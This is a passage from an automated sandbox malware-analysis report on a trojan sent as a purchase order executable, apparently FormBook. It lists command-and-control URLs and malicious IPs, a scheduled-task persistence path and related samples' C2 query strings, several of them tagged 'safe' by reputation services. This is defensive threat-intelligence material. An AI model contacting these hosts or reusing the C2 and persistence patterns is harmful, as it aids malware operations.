                                          http://www.family-lawyers-7009103.world/md02/www.upcyclecharms.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.theopencomputeproject.netReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.coloradoskinwellness.com/md02/www.tiantiying.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.coloradoskinwellness.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.117myw.com/md02/www.webuyandsellpa.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.a1b5v.xyz/md02/www.117myw.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.upcyclecharms.com/md02/www.a1b5v.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.upcyclecharms.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ux-design-courses-17184.bondexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 0000000A.00000000.2168253854.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.rnwaifu.xyz/md02/explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.upcyclecharms.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://outlook.comeexplorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiantiying.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hecxion.xyz/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/Iexplorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.woby.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.family-lawyers-7009103.worldReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiantiying.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.theopencomputeproject.net/md02/www.z8ggd.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://status.squarespace.comexplorer.exe, 0000000A.00000002.4559537776.00000000113AF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000556F000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.woby.xyz/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiantiying.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hecxion.xyz/md02/www.theopencomputeproject.netexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.webuyandsellpa.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.microexplorer.exe, 0000000A.00000000.2149371209.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4553241787.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2158143690.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.117myw.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.a1b5v.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.z8ggd.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.upcyclecharms.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.woby.xyz/md02/www.rnwaifu.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.z8ggd.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mzhhxxff.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mzhhxxff.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ux-design-courses-17184.bondReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.theopencomputeproject.netexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.z8ggd.com/md02/www.equipoleiremnacional.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.coloradoskinwellness.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://excel.office.com-explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.117myw.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://powerpoint.office.comEMdexplorer.exe, 0000000A.00000000.2168253854.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.a1b5v.xyz/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.family-lawyers-7009103.world/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          192.250.227.27
                                          		equipoleiremnacional.comUnited States
                                          		36454CNSV-LLCUStrue
                                          198.185.159.144
                                          		ext-sq.squarespace.comUnited States
                                          		53831SQUARESPACEUStrue
                                          185.53.179.92
                                          		www.ux-design-courses-17184.bondGermany
                                          		61969TEAMINTERNET-ASDEtrue
                                          203.196.8.7
                                          		www.tiantiying.comChina
                                          		4809CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarrtrue
                                          15.197.142.173
                                          		theopencomputeproject.netUnited States
                                          		7430TANDEMUStrue
                                          3.33.130.190
                                          		detroitreels.comUnited States
                                          		8987AMAZONEXPANSIONGBtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1467133
                                          Start date and time:2024-07-03 18:31:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 12m 31s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:27
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:Orden de compra 0307AR24.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@814/15@11/6
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 144
                                          • Number of non-executed functions: 333
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: Orden de compra 0307AR24.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          12:31:54API Interceptor1x Sleep call for process: Orden de compra 0307AR24.exe modified
                                          12:31:59API Interceptor29x Sleep call for process: powershell.exe modified
                                          12:32:00API Interceptor9782849x Sleep call for process: explorer.exe modified
                                          12:32:02API Interceptor1x Sleep call for process: RggSaCWUvAyNK.exe modified
                                          12:32:43API Interceptor8972407x Sleep call for process: systray.exe modified
                                          18:32:01Task SchedulerRun new task: RggSaCWUvAyNK path: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          192.250.227.27jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                                          • veysiseker.com/FOB.bin
                                          198.185.159.144Att00173994.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • www.2thetcleaningservice.com/mc10/?FPWhWLW=JxJ83Varoc/pDqX/ejTG8SZAK8Thxjdz6WwKL+xsDsFdju7eAxYDUbfmaSdrJy7HwmgH2Kq9Hg==&AlB=8pdT8tsp
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • www.amycostellospeech.com/ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • www.bankablebark.com/dy13/?jDHph=9ZSG7Fw6wFJMggGvtga1Qh3mQQl9Rgy3K16+Oe6KY82/n3IrznmlP/WDuEbFz6mxdG1sfeS45g==&Wt=IBZX4leh3ZCl
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • www.nearmeacupuncture.com/dy13/?Rzr=Lbyx94Ip0tNX&alI=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2
                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.wearelemonpepper.com/aqhg/
                                          185.53.179.92Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                          • www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu
                                          PO_0049_&_0050.xlsGet hashmaliciousFormBookBrowse
                                          • www.family-doctor-30030.com/my28/?h2Jdv=79IGywBWJhGw8mHY4Ed55Qbw0iEgtBEh+S8JDPa/nYZjsEVgaC4IJbnYN4OFlpxaLyr5Lg==&9rQ=c48da8_XbVvlJH8
                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?l4DHGh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&p41P=mVDhw
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?FD=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&8psPYP=k4Hh
                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?f8HLWH=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&0T=Z87P2TP
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?k4p=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&ijc=1bxDp
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?q4=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&5jdh=DPxH-Ti82
